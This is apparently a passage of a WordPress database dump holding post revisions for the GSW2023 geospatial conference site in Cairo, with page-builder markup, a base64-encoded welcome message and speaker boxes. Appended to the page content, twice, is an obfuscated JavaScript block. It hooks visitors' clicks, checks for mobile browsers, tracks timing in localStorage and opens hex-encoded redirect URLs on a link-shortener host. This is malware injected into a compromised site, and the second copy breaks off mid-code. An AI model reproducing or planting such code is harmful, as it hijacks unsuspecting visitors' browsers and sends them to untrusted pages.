title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 22:03:43','2022-11-09 22:03:43','',3233,'https://gsw2023.com/?p=3257',0,'revision','',0),
(3258,1,'2022-11-09 22:04:39','2022-11-09 22:04:39','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text]\r\n\r\n[video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video]\r\n\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 